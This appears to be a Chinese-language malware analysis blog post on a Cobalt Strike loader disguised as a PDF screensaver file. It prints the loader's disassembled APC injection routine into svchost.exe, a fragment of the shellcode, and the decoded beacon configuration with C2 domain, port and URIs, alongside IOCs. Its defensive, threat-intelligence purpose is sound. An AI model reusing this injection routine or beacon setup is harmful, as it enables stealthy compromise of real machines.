异常问题汇总_sample_malaware_report

基本信息

样本概述

某天晚上朋友发了一个样本给我，说他们在前场发现了一个样本，但是自己从沙盒还有抓爆都没有发现C2，当时只是奔着快速解决问题的目的帮他迅速找出C2，所以没有做太多分析，正好有时间详细的分析一下，先说结论又是个CS的木马，不过手法还是有点意思的

样本发现日期

2022-07-31?13:56:36

样本类型

TrojanRozena

样本文件大小/被感染文件变化长度

异常问题汇总.pdf.scr?673K

样本文件MD5校验值

204b061362fddd30bcaa4962b44fe4fd

样本文件SHA1校验值

dd3f9ca8bf6ea723fdd8fdd17d7d3ec510d17f0d

样本文件SHA256校验值

91a20d03aafd7f931e9e7fc75ff3b1368bf9f9c8cb8fd37555e7dac3bc192701

壳信息

DIE扫描出的信息这个样本是个rar

里边具体有啥不知道，把后缀名更改为rar，那就先解压

发现里边有两个文件

Setup=C:\Users\Public\异常问题汇总.pdf
Setup=C:\Users\Public\360se13.1.6050.0.exe

在DIE扫描360se13.1.6050.0.exe

发现这个程序大概率加了VMP2.x~3.x的壳

由于自己没怎么分析过pdf索性就直接丢给朋友看了一下

朋友也没有在pdf发现什么问题，应该是没问题

可能受到的威胁的系统

["win7_sp1_enx86_office2013","win10_1903_enx64_office2016","win7_sp1_enx64_office2013"]

相关漏洞

未涉及

已知检测名称

异常问题汇总.pdf.scr

被感染系统及网络症状

文件系统&&注册表变化

在ProcessMonitor监测的时候，并未发现样本有释放恶意文件的行为，其他文件和注册表均是正常文件操作行为

网络症状

我们在云端沙盒跑了一下，也在自己的离线沙盒跑了一下，的确没啥可疑的连接

但是经过我们动态调试发现样本是注入到svchost.exe发起的C2连接

download.360download.ga?43.239.158.51

详细分析

我们使用命令行对7z文件进行解压，从命令行中我们可以看到这个样本是scr伪装的pdf，其中加了很多空格

什么是.scr? 根据微软的描述，这个东西就是屏幕保护程序，而且是可执行程序，相关介绍直接看英文

When the screensaver is launched, it scans the Common Feed List for RSS feed items that contain enclosures (binary attachments) that can be displayed. Then it creates a full-screen Windows Form and displays data from the feeds. A timer is used to update the currently selected topic and change the background image.

https://docs.microsoft.com/en-us/previous-versions/windows/desktop/ms686421(v=vs.85)

我们稍微休整一下名称

静态分析

简单过滤字符串，发现hacker主机的用户名yhbl

就凭这个想溯源到人还是很难的，字符串中并没有发现太多有用的东西，因为被vmp处理过了，但是我们还是能够发现一些东西的，比如loader2.cpp这样的，盲猜这个样本与CS有关，凭经验来看，国外开发者很少会以什么什么loader来写，这样整的绝大多数都可能是中国开发者，这其实只是十分十分客观的，并不能说明什么问题，大家当我瞎说的就可以了，如果以后机会后边能证实，我在回来圆

因为我们人工看有些时候可能会漏看某些重要的数据，我们还是老规矩pestudio

命中黑名单的有55个，hinit大概和我们在strings看到的差不多，我们这里看到mingw，这个程序可能是qt写的, 从黑名单中命中的导入函数来看，很符合加载器的功能

getShellcode
$shellcodeSize
$victimProcess
CreateProcessA
ResumeThread
WriteProcessMemory
getShellcode
$shellcodeSize
$victimProcess
VirtualAllocEx
VirtualProtect
VirtualQuery
TlsGetValue
QueueUserAPC
DeleteCriticalSection
EnterCriticalSection
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
GetLastError
GetStartupInfoA
GetSystemTimeAsFileTime
GetTickCount
InitializeCriticalSection
LeaveCriticalSection
QueryPerformanceCounter
RtlAddFunctionTable
RtlCaptureContext
RtlLookupFunctionEntry
RtlVirtualUnwind
SetUnhandledExceptionFilter
TerminateProcess
UnhandledExceptionFilter

程序所使用的动态链接库

libgcc_s_seh-1.dll
KERNEL32.dll
msvcrt.dll
USER32.dll
libstdc++-6.dll

虽然程序被vmp了，但是我们还是抱着一点心态看看能能不能有些收获

投入Binary Ninja，后续也慢慢会将使用习惯慢慢转移到Binary Ninja

不负众望，我们的bna直接分析出了main函数

我们看到_Z12getShellcodePc这个函数的实现，由于都是伪函数所以我们不清楚具体作用分析起来也很麻烦

0040178a??int64_t?_Z12getShellcodePc(int64_t?arg1)

004017a6??????void?var_49
004017a6??????_ZNSaIcEC1Ev(&var_49)
004017bd??????void?var_78
004017bd??????_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEC1EPKcRKS3_(&var_78,?arg1,?&var_49)
004017c9??????_ZNSaIcED1Ev(&var_49)
004017df??????int32_t?rax_2?=?_ZNKSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEE6lengthEv(&var_78)?+?0x7fffffff?+?_ZNKSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEE6lengthEv(&var_78)?+?0x7fffffff
004017f1??????for?(int32_t?var_1c?=?0;?var_1c?s<?rax_2;?var_1c?=?var_1c?+?4)
00401807??????????_ZNSt7__cxx1112basic_str...cSt11char_traitsIcESaIcEE6insertEyPKc(&var_78,?sx.q(var_1c),?&data_405028)
0040181d??????void?var_48
0040181d??????_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEC1ERKS4_(&var_48,?&var_78)
00401829??????_Z13execShellcodeNSt7__c...sic_stringIcSt11char_traitsIcESaIcEEE(&var_48)
00401835??????_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEED1Ev(&var_48)
00401897??????return?_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEED1Ev(&var_78)

我们看到这个arg1的返回值类型是int64，我们这里看004017f1这一行

for?(int32_t?var_1c?=?0;?var_1c?s<?rax_2;?var_1c?=?var_1c?+?4)

盲猜是把data_405028转换为shellcode， 而data_405028的数据是

9090904d5a4152554889e54881ec2000…

然后返回给_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEED1Ev也就是0x8bae8

明显是pe文件，在继续分析的过程中，发现Binary Ninja自动分析注释的太差，基本没有可读性，我们依旧使用ida

?_Z12getShellcodePc这个函数地址，就是该样本的关键函数，我们来看一下伪代码就更容易懂了

{
??HWND?hwndDOS;?//?ST28_8

??_main();
??hwndDOS?=?GetForegroundWindow();
??ShowWindow(hwndDOS,?0);
??getShellcode(shellcode);
??return?0i64;
}

我们重点分析一下_Z12getShellcodePc，首先看一下他的伪代码

看红圈圈住的，在ida里把那段shellcode数据数据名称解析成了shellcode这更方便我们分析，它实现的功能和我们上面用Binary Ninja分析的作用相同都是将字符串转换为十六进制的shellcoode，在

而接下来就是shellcode执行的过程

我们跟进一下execShellcode这个函数

bInheritHandles?=?dword?ptr?-175F70h
.text:0000000000401550?dwCreationFlags?=?dword?ptr?-175F68h
.text:0000000000401550?lpEnvironment???=?qword?ptr?-175F60h
.text:0000000000401550?lpCurrentDirectory=?qword?ptr?-175F58h
.text:0000000000401550?lpStartupInfo???=?qword?ptr?-175F50h
.text:0000000000401550?lpProcessInformation=?qword?ptr?-175F48h
.text:0000000000401550?ProcessInformation=?_PROCESS_INFORMATION?ptr?-175F40h
.text:0000000000401550?StartupInfo?????=?_STARTUPINFOA?ptr?-175F20h
.text:0000000000401550?Dst?????????????=?byte?ptr?-175EB0h
.text:0000000000401550?var_60??????????=?byte?ptr?-60h
.text:0000000000401550?pfnAPC??????????=?qword?ptr?-38h
.text:0000000000401550?lpBaseAddress???=?qword?ptr?-30h
.text:0000000000401550?hThread?????????=?qword?ptr?-28h
.text:0000000000401550?hProcess????????=?qword?ptr?-20h
.text:0000000000401550?dwSize??????????=?qword?ptr?-18h
.text:0000000000401550?arg_0???????????=?qword?ptr??10h
.text:0000000000401550
.text:0000000000401550?????????????????push????rbp
.text:0000000000401551?????????????????push????rdi
.text:0000000000401552?????????????????push????rbx
.text:0000000000401553?????????????????mov?????eax,?175F80h
.text:0000000000401558?????????????????call????___chkstk_ms
.text:000000000040155D?????????????????sub?????rsp,?rax
.text:0000000000401560?????????????????lea?????rbp,?[rsp+80h]
.text:0000000000401568?????????????????mov?????[rbp+175F10h+arg_0],?rcx
.text:000000000040156F?????????????????lea?????rax,?[rbp+175F10h+Dst]
.text:0000000000401573?????????????????mov?????edx,?175E46h
.text:0000000000401578?????????????????mov?????r8,?rdx?????????;?Size
.text:000000000040157B?????????????????mov?????edx,?0??????????;?Val
.text:0000000000401580?????????????????mov?????rcx,?rax????????;?Dst
.text:0000000000401583?????????????????call????memset
.text:0000000000401588?????????????????mov?????dword?ptr?[rbp+175F10h+dwSize+4],?0
.text:0000000000401592
.text:0000000000401592?loc_401592:?????????????????????????????;?CODE?XREF:?execShellcode(std::__cxx11::basic_string<char,std::char_traits<char>,std::allocator<char>>)+D9↓j
.text:0000000000401592?????????????????mov?????eax,?dword?ptr?[rbp+175F10h+dwSize+4]
.text:0000000000401598?????????????????movsxd??rbx,?eax
.text:000000000040159B?????????????????mov?????rcx,?[rbp+175F10h+arg_0]
.text:00000000004015A2?????????????????call????_ZNKSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEE4sizeEv?;?std::__cxx11::basic_string<char,std::char_traits<char>,std::allocator<char>>::size(void)
.text:00000000004015A7?????????????????shr?????rax,?2
.text:00000000004015AB?????????????????cmp?????rbx,?rax
.text:00000000004015AE?????????????????setb????al
.text:00000000004015B1?????????????????test????al,?al
.text:00000000004015B3?????????????????jz??????short?loc_40162E
.text:00000000004015B5?????????????????mov?????eax,?dword?ptr?[rbp+175F10h+dwSize+4]
.text:00000000004015BB?????????????????shl?????eax,?2
.text:00000000004015BE?????????????????add?????eax,?2
.text:00000000004015C1?????????????????movsxd??rdx,?eax
.text:00000000004015C4?????????????????lea?????rax,?[rbp+175F10h+var_60]
.text:00000000004015CB?????????????????mov?????r9d,?2
.text:00000000004015D1?????????????????mov?????r8,?rdx
.text:00000000004015D4?????????????????mov?????rdx,?[rbp+175F10h+arg_0]
.text:00000000004015DB?????????????????mov?????rcx,?rax
.text:00000000004015DE?????????????????call????_ZNKSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEE6substrEyy?;?std::__cxx11::basic_string<char,std::char_traits<char>,std::allocator<char>>::substr(ulong?long,ulong?long)
.text:00000000004015E3?????????????????lea?????rax,?[rbp+175F10h+var_60]
.text:00000000004015EA?????????????????mov?????rcx,?rax
.text:00000000004015ED?????????????????call????_ZNKSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEE5c_strEv?;?std::__cxx11::basic_string<char,std::char_traits<char>,std::allocator<char>>::c_str(void)
.text:00000000004015F2?????????????????mov?????r8d,?10h????????;?Radix
.text:00000000004015F8?????????????????mov?????edx,?0??????????;?EndPtr
.text:00000000004015FD?????????????????mov?????rcx,?rax????????;?Str
.text:0000000000401600?????????????????call????strtoul
.text:0000000000401605?????????????????mov?????edx,?eax
.text:0000000000401607?????????????????mov?????eax,?dword?ptr?[rbp+175F10h+dwSize+4]
.text:000000000040160D?????????????????cdqe
.text:000000000040160F?????????????????mov?????[rbp+rax+175F10h+Dst],?dl
.text:0000000000401613?????????????????lea?????rax,?[rbp+175F10h+var_60]
.text:000000000040161A?????????????????mov?????rcx,?rax
.text:000000000040161D?????????????????call????_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEED1Ev?;?std::__cxx11::basic_string<char,std::char_traits<char>,std::allocator<char>>::~basic_string()
.text:0000000000401622?????????????????add?????dword?ptr?[rbp+175F10h+dwSize+4],?1
.text:0000000000401629?????????????????jmp?????loc_401592

前边这些都是各种初始化，准备栈环境，没什么好分析的

然后我们看loc_40162E，

loc_40162E:?????????????????????????????;?CODE?XREF:?execShellcode(std::__cxx11::basic_string<char,std::char_traits<char>,std::allocator<char>>)+63↑j
.text:000000000040162E?????????????????mov?????dword?ptr?[rbp+175F10h+dwSize],?175E46h
.text:0000000000401638?????????????????lea?????rdx,?[rbp+175F10h+StartupInfo]
.text:000000000040163C?????????????????mov?????eax,?0
.text:0000000000401641?????????????????mov?????ecx,?0Dh
.text:0000000000401646?????????????????mov?????rdi,?rdx
.text:0000000000401649?????????????????rep?stosq
.text:000000000040164C?????????????????mov?????[rbp+175F10h+ProcessInformation.hProcess],?0
.text:0000000000401654?????????????????mov?????[rbp+175F10h+ProcessInformation.hThread],?0
.text:000000000040165C?????????????????mov?????qword?ptr?[rbp+175F10h+ProcessInformation.dwProcessId],?0
.text:0000000000401664?????????????????lea?????rax,?[rbp+175F10h+ProcessInformation]
.text:0000000000401668?????????????????mov?????[rsp+175F90h+lpProcessInformation],?rax?;?lpProcessInformation
.text:000000000040166D?????????????????lea?????rax,?[rbp+175F10h+StartupInfo]
.text:0000000000401671?????????????????mov?????[rsp+175F90h+lpStartupInfo],?rax?;?lpStartupInfo
.text:0000000000401676?????????????????mov?????[rsp+175F90h+lpCurrentDirectory],?0?;?lpCurrentDirectory
.text:000000000040167F?????????????????mov?????[rsp+175F90h+lpEnvironment],?0?;?lpEnvironment
.text:0000000000401688?????????????????mov?????[rsp+175F90h+dwCreationFlags],?4?;?dwCreationFlags
.text:0000000000401690?????????????????mov?????[rsp+175F90h+bInheritHandles],?0?;?bInheritHandles
.text:0000000000401698?????????????????mov?????r9d,?0??????????;?lpThreadAttributes
.text:000000000040169E?????????????????mov?????r8d,?0??????????;?lpProcessAttributes
.text:00000000004016A4?????????????????mov?????edx,?0??????????;?lpCommandLine
.text:00000000004016A9?????????????????lea?????rcx,?ApplicationName?;?"C:\\Windows\\System32\\svchost.exe"
.text:00000000004016B0?????????????????mov?????rax,?cs:__imp_CreateProcessA
.text:00000000004016B7?????????????????call????rax?;?__imp_CreateProcessA
.text:00000000004016B9?????????????????mov?????rax,?[rbp+175F10h+ProcessInformation.hProcess]
.text:00000000004016BD?????????????????mov?????[rbp+175F10h+hProcess],?rax
.text:00000000004016C4?????????????????mov?????rax,?[rbp+175F10h+ProcessInformation.hThread]
.text:00000000004016C8?????????????????mov?????[rbp+175F10h+hThread],?rax
.text:00000000004016CF?????????????????mov?????edx,?dword?ptr?[rbp+175F10h+dwSize]
.text:00000000004016D5?????????????????mov?????rax,?[rbp+175F10h+hProcess]
.text:00000000004016DC?????????????????mov?????[rsp+175F90h+bInheritHandles],?40h?;?flProtect
.text:00000000004016E4?????????????????mov?????r9d,?1000h??????;?flAllocationType
.text:00000000004016EA?????????????????mov?????r8,?rdx?????????;?dwSize
.text:00000000004016ED?????????????????mov?????edx,?0??????????;?lpAddress
.text:00000000004016F2?????????????????mov?????rcx,?rax????????;?hProcess
.text:00000000004016F5?????????????????mov?????rax,?cs:__imp_VirtualAllocEx
.text:00000000004016FC?????????????????call????rax?;?__imp_VirtualAllocEx
.text:00000000004016FE?????????????????mov?????[rbp+175F10h+lpBaseAddress],?rax
.text:0000000000401705?????????????????mov?????rax,?[rbp+175F10h+lpBaseAddress]
.text:000000000040170C?????????????????mov?????[rbp+175F10h+pfnAPC],?rax
.text:0000000000401713?????????????????mov?????r8d,?dword?ptr?[rbp+175F10h+dwSize]
.text:000000000040171A?????????????????lea?????rcx,?[rbp+175F10h+Dst]
.text:000000000040171E?????????????????mov?????rdx,?[rbp+175F10h+lpBaseAddress]?;?lpBaseAddress
.text:0000000000401725?????????????????mov?????rax,?[rbp+175F10h+hProcess]
.text:000000000040172C?????????????????mov?????qword?ptr?[rsp+175F90h+bInheritHandles],?0?;?lpNumberOfBytesWritten
.text:0000000000401735?????????????????mov?????r9,?r8??????????;?nSize
.text:0000000000401738?????????????????mov?????r8,?rcx?????????;?lpBuffer
.text:000000000040173B?????????????????mov?????rcx,?rax????????;?hProcess
.text:000000000040173E?????????????????mov?????rax,?cs:__imp_WriteProcessMemory
.text:0000000000401745?????????????????call????rax?;?__imp_WriteProcessMemory
.text:0000000000401747?????????????????mov?????rdx,?[rbp+175F10h+hThread]?;?hThread
.text:000000000040174E?????????????????mov?????rax,?[rbp+175F10h+pfnAPC]
.text:0000000000401755?????????????????mov?????r8d,?0??????????;?dwData
.text:000000000040175B?????????????????mov?????rcx,?rax????????;?pfnAPC
.text:000000000040175E?????????????????mov?????rax,?cs:__imp_QueueUserAPC
.text:0000000000401765?????????????????call????rax?;?__imp_QueueUserAPC
.text:0000000000401767?????????????????mov?????rax,?[rbp+175F10h+hThread]
.text:000000000040176E?????????????????mov?????rcx,?rax????????;?hThread
.text:0000000000401771?????????????????mov?????rax,?cs:__imp_ResumeThread
.text:0000000000401778?????????????????call????rax?;?__imp_ResumeThread
.text:000000000040177A?????????????????mov?????eax,?0
.text:000000000040177F?????????????????add?????rsp,?175F80h
.text:0000000000401786?????????????????pop?????rbx
.text:0000000000401787?????????????????pop?????rdi
.text:0000000000401788?????????????????pop?????rbp
.text:0000000000401789?????????????????retn

创建svchost进程并获取进程id，获取完毕后利用VirualAllocEx函数svchost进程中开辟内存空间并利用WriteProcessMemory向进程注入shellcode，使用已分配内存段的起始地址在远程进程中创建一个线程，当线程进入预警状态时，将线程提交至执行队列，将线程恢复至预警状态

动态分析

沙箱动态检测情况:

ThreatBook:?????????"https://s.threatbook.cn/search?query=91a20d03aafd7f931e9e7fc75ff3b1368bf9f9c8cb8fd37555e7dac3bc192701&type=sha256"
VirusTotal:?????????"https://www.virustotal.com/gui/file/e49c94732ee6f709c455bca51338207443ee0b56cd78bef901bebf27ac3d05b1"

相关检测数据:

malaware_rate:??????4/22
threat_tag:?????????TrojanRozena
sandbox_AVG:??????safe
sandbox_Antiy:??????safe
sandbox_Avast:??????Win64:Trojan-gen
sandbox_Avira:??????safe
sandbox_ClamAV:??safe
sandbox_DrWeb:??????safe
sandbox_ESET:??????a?variant?of?Win64/Rozena.BY?trojan
sandbox_GDATA:??????Gen:Variant.Barys.314163
sandbox_IKARUS:??safe
sandbox_JiangMin:??safe
sandbox_K7:??????safe
sandbox_Kaiwei:??null
sandbox_Kaspersky:??safe
sandbox_Kingsoft:??null
sandbox_Microsoft:??safe
sandbox_NANO:??????safe
sandbox_Panda:??????safe
sandbox_Qihu360:??Trojan.Generic
sandbox_Rising:??safe
sandbox_Sophos:??safe
sandbox_Tencent:??null
sandbox_Trustlook:??safe
sandbox_vbwebshell:?safe

在程序运行起来的时候，发现报了这样的一个错，缺少libstdc++-6.dll这个

最开始并没有意识到这是个qt程序，装了mingw64程序可以正确跑起来了

我们使用ProcessMonitor对样本的注册表，文件相关进行监测分析，首先，我们发现样本通过?CreateProcessA创建了svchost.exe这个进程

发现样本使用CreateToolhelp32Snapshot对360se13.1.6050.0做了进程快照

接下来，我们监测到svchost.exe调用了winnet.dl的HttpAddRequestHeaderA

我们在静态分析以及上面用Process Monitor进行监测的时候，通过字符串以及样本伪代码分析，收集到了样本使用的相关函数，如下，我们将在动态调试过程中以以下函数作为断点进行调试

ResumeThread
WriteProcessMemory
VirtualAllocEx
VirtualProtect
VirtualQuery
TlsGetValue
QueueUserAPC
DeleteCriticalSection
EnterCriticalSection
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
GetLastError
GetStartupInfoA
GetSystemTimeAsFileTime
GetTickCount
InitializeCriticalSection
LeaveCriticalSection
QueryPerformanceCounter
RtlAddFunctionTable
RtlCaptureContext
RtlLookupFunctionEntry
RtlVirtualUnwind
SetUnhandledExceptionFilter
TerminateProcess
UnhandledExceptionFilter
CreateToolhelp32Snapshot
CreateProcessA??KernelBase.dll
CreateFileW?KernelBase.dll
CreateProcessA??KernelBase.dll
LoadLibaryExw?KernelBase.dll
LoadLibaryExA?KernelBase.dll

接下来我们将样本以x64dbg对样本进行动态调试，首先样本调用?GetSystemTimeAsFile作为svchost.exe的文件创建时间

然后调用GetCurrentProcessId，获取360se13.1.6050.0进程ID

将shellcode?拷贝到内存中

( 将内存拷贝到内存中之后，RtlUserThreadStart启动svchost.exe

我们在前边监测的时候样本使用了CreateToolhelp32Snapshot对360se13.1.6050.0做了进程快照，然后现在使用ResumThread将其线程恢复，然后TerminateProcess退出360se13.1.6050.0

然后，svchost.exe触发到WriteProcessMemory断点

观察到，90 90 90 4D 5A就是我们在之前看到的shellcode，我们直接提取内存，按照如下参数位置和大小进行提取

3:?r8?0000000000539E90?"悙怣ZARUH夊H侅?"
4:?r9?0000000000175E46?

然后我们对内存进行CobaltStrike配置进行解析，详细配置如下:

BeaconType???????????????????????-?HTTPS
Port?????????????????????????????-?2083
SleepTime????????????????????????-?38500
MaxGetSize???????????????????????-?1399607
Jitter???????????????????????????-?27
MaxDNS???????????????????????????-?Not?Found
PublicKey_MD5????????????????????-?16b0247800e41cd0902cde1056cfc8a2
C2Server?????????????????????????-?download.360download.ga,/api/broadcast/index
UserAgent????????????????????????-?Mozilla/5.0?(Windows?NT?10.0;?Win64;?x64)?AppleWebKit/537.36?(KHTML,?like?Gecko)?Chrome/74.0.3729.169?Safari/537.36
HttpPostUri??????????????????????-?/api/new/1/events/com.amazon.csm.csa.prod
Malleable_C2_Instructions????????-?Remove?1308?bytes?from?the?end
???????????????????????????????????Remove?1?bytes?from?the?end
???????????????????????????????????Remove?194?bytes?from?the?beginning
???????????????????????????????????Base64?decode
HttpGet_Metadata?????????????????-?ConstHeaders
????????????????????????????????????Accept:?application/json,?text/plain,?*/*
????????????????????????????????????Accept-Language:?en-US,en;q=0.5
????????????????????????????????????Origin:?https://www.amazon.com
????????????????????????????????????Referer:?https://www.amazon.com
????????????????????????????????????Sec-Fetch-Dest:?empty
????????????????????????????????????Sec-Fetch-Mode:?cors
????????????????????????????????????Sec-Fetch-Site:?cross-site
????????????????????????????????????Te:?trailers
???????????????????????????????????Metadata
????????????????????????????????????base64
????????????????????????????????????header?"x-amzn-RequestId"
HttpPost_Metadata????????????????-?ConstHeaders
????????????????????????????????????Accept:?*/*
????????????????????????????????????Origin:?https://www.amazon.com
???????????????????????????????????SessionId
????????????????????????????????????base64url
????????????????????????????????????header?"x-amz-rid"
???????????????????????????????????Output
????????????????????????????????????base64url
????????????????????????????????????prepend?"{"events":[{"data":{"schemaId":"csa.VideoInteractions.1","application":"Retail:Prod:,"requestId":"MBFV82TTQV2JNBKJJ50B","title":"Amazon.com.?Spend?less.?Smile?more.","subPageType":"desktop","session":{"id":"133-9905055-2677266"},"video":{"id":""
????????????????????????????????????append?""
"
????????????????????????????????????append?""playerMode":"INLINE","videoRequestId":"MBFV82TTQV2JNBKJJ50B","isAudioOn":"false","player":"IVS","event":"NONE"}}}}]}"
????????????????????????????????????print
PipeName?????????????????????????-?Not?Found
DNS_Idle?????????????????????????-?Not?Found
DNS_Sleep????????????????????????-?Not?Found
SSH_Host?????????????????????????-?Not?Found
SSH_Port?????????????????????????-?Not?Found
SSH_Username?????????????????????-?Not?Found
SSH_Password_Plaintext???????????-?Not?Found
SSH_Password_Pubkey??????????????-?Not?Found
SSH_Banner???????????????????????-?Host:?download.360download.ga

HttpGet_Verb?????????????????????-?GET
HttpPost_Verb????????????????????-?POST
HttpPostChunk????????????????????-?0
Spawnto_x86??????????????????????-?%windir%\syswow64\gpupdate.exe
Spawnto_x64??????????????????????-?%windir%\sysnative\gpupdate.exe
CryptoScheme?????????????????????-?0
Proxy_Config?????????????????????-?Not?Found
Proxy_User???????????????????????-?Not?Found
Proxy_Password???????????????????-?Not?Found
Proxy_Behavior???????????????????-?Use?IE?settings
Watermark????????????????????????-?100000
bStageCleanup????????????????????-?True
bCFGCaution??????????????????????-?True
KillDate?????????????????????????-?0
bProcInject_StartRWX?????????????-?True
bProcInject_UseRWX???????????????-?False
bProcInject_MinAllocSize?????????-?16700
ProcInject_PrependAppend_x86?????-?b'\x90\x90\x90'
???????????????????????????????????Empty
ProcInject_PrependAppend_x64?????-?b'\x90\x90\x90'
???????????????????????????????????Empty
ProcInject_Execute???????????????-?ntdll.dll:RtlUserThreadStart
???????????????????????????????????SetThreadContext
???????????????????????????????????NtQueueApcThread-s
???????????????????????????????????kernel32.dll:LoadLibraryA
???????????????????????????????????RtlCreateUserThread
ProcInject_AllocationMethod??????-?NtMapViewOfSection
bUsesCookies?????????????????????-?False
HostHeader???????????????????????-?Host:?download.360download.ga

headersToRemove??????????????????-?Not?Found
DNS_Beaconing????????????????????-?Not?Found
DNS_get_TypeA????????????????????-?Not?Found
DNS_get_TypeAAAA?????????????????-?Not?Found
DNS_get_TypeTXT??????????????????-?Not?Found
DNS_put_metadata?????????????????-?Not?Found
DNS_put_output???????????????????-?Not?Found
DNS_resolver?????????????????????-?Not?Found
DNS_strategy?????????????????????-?round-robin
DNS_strategy_rotate_seconds??????-?-1
DNS_strategy_fail_x??????????????-?-1
DNS_strategy_fail_seconds????????-?-1

我们继续跑，触发断点InternetOpenA，样本向C2发起连接

触发断点HttpRequestSend，发起http请求

战术

关联分析

从微步得知，该样本

该样本于2022-07-04发现的，在2022-07-20该域名与43.239.158.51完成解析，没有发现恶意，但是我从域名的历史解析发现该域名于2022-07-04与以下域名解析过

172.67.205[.]173
104.21.90[.]124

但是这三个IP，微步均未报异常

IOCs

download.360download[.]ga
/api/new/1/events/com.amazon.csm[.]csaprod
/api/broadcast/index
port:?2083
172.67.205[.]173
104.21.90[.]124
%windir%\syswow64\gpupdate.exe
%windir%\sysnative\gpupdate.exe

关注公众号：拾黑（shiheibook）了解更多

[广告]赞助链接：

四季很好，只要有你，文娱排行榜：https://www.yaopaiming.com/
让资讯触达的更精准有趣：https://www.0xu.cn/